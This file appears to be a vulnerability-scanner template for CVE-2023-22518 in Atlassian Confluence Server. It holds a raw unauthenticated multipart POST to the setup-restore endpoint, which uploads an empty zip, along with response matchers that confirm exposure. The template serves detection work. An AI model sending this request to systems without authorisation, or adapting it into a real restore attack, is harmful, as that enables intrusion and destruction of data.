60 lines
2.6 KiB
YAML
60 lines
2.6 KiB
YAML
id: CVE-2023-22518
|
|
|
|
info:
|
|
name: Atlassian Confluence Server - Improper Authorization
|
|
author: iamnoooob,rootxharsh,pdresearch
|
|
severity: critical
|
|
description: |
|
|
All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.
|
|
Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
|
|
reference:
|
|
- https://confluence.atlassian.com/pages/viewpage.action?pageId=1311473907
|
|
- https://blog.projectdiscovery.io/atlassian-confluence-auth-bypass/
|
|
- https://jira.atlassian.com/browse/CONFSERVER-93142
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-22518
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
|
|
cvss-score: 9.1
|
|
cve-id: CVE-2023-22518
|
|
epss-score: 0.00054
|
|
epss-percentile: 0.20098
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: atlassian
|
|
product: confluence_data_center
|
|
shodan-query: http.component:"Atlassian Confluence"
|
|
note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts.
|
|
tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /json/setup-restore.action HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7
|
|
X-Atlassian-Token: no-check
|
|
|
|
------WebKitFormBoundaryT3yekvo0rGaL9QR7
|
|
Content-Disposition: form-data; name="buildIndex"
|
|
|
|
false
|
|
------WebKitFormBoundaryT3yekvo0rGaL9QR7
|
|
Content-Disposition: form-data; name="file";filename="{{randstr}}.zip"
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundaryT3yekvo0rGaL9QR7
|
|
Content-Disposition: form-data; name="edit"
|
|
|
|
Upload and import
|
|
------WebKitFormBoundaryT3yekvo0rGaL9QR7--
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "status_code == 200"
|
|
- "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"
|
|
condition: and
|
|
|
|
# digest: 4a0a00473045022100c9ee6b1bed1fe6ed05f3cf780e6d0b6a150b42ce384c484fe64a60a00326f34802201bab199181f4f5094b07cabcdc7b962d4d0cc419571e72d1448df4d4c398933e:922c64590222798bb761d5b6d8e72950
|